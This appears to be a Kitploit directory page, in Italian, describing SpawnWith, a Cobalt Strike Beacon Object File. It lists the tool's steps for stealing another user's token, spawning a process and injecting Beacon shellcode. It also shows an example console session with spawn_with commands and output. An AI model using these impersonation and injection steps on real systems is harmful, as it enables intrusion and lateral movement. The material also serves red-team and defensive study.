Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SpawnWith — Cobalt Strike BOF che genera un processo utilizzando il token di un altro utente e inietta lo shellcode di Beacon, consentendo post-sfruttamento e movimento laterale tramite impersonazione. | Kitploit
Strumenti/GitHubGitHub/rasta-mouse/spawnwith
Escalation di PrivilegiStrumenti di ImpersonificazioneMovimento LateralePost-ExploitCommand and Control
GitHubrasta-mouse/spawnwith

SpawnWith

Cobalt Strike BOF che genera un processo utilizzando il token di un altro utente e inietta lo shellcode di Beacon, consentendo post-sfruttamento e movimento laterale tramite impersonazione.

Vedi Repository
11217221 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SpawnWith

Un Beacon Object File (BOF) sperimentale che offre un'alternativa ai comandi spawnas e inject. Questo espone un nuovo comando, spawn_with [pid] [listener], che esegue le seguenti operazioni:

  1. Ottiene un handle al processo di destinazione.
  2. Ottiene un handle al token primario del processo.
  3. Duplica il token primario in un token di impersonificazione.
  4. Ottiene il valore spawnto del Beacon.
  5. Tenta di generare un nuovo processo con il token duplicato usando CreateProcessWithTokenW.
    • Se questo tentativo fallisce, prova CreateProcessAsUserW.
  6. Inietta lo shellcode del Beacon nel processo generato.
    • Collega il Beacon in caso di P2P.

Esempio

beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)

beacon> ps
22656 21972 wordpad.exe   x64   1   DESKTOP-1U6AHIU\test_user

beacon> spawnto x64 %windir%\sysnative\notepad.exe

beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:

Spawned PID 45668 and injected 297472 bytes

[+] established link to child beacon: 192.168.0.195

Beacons

Scarica lo strumento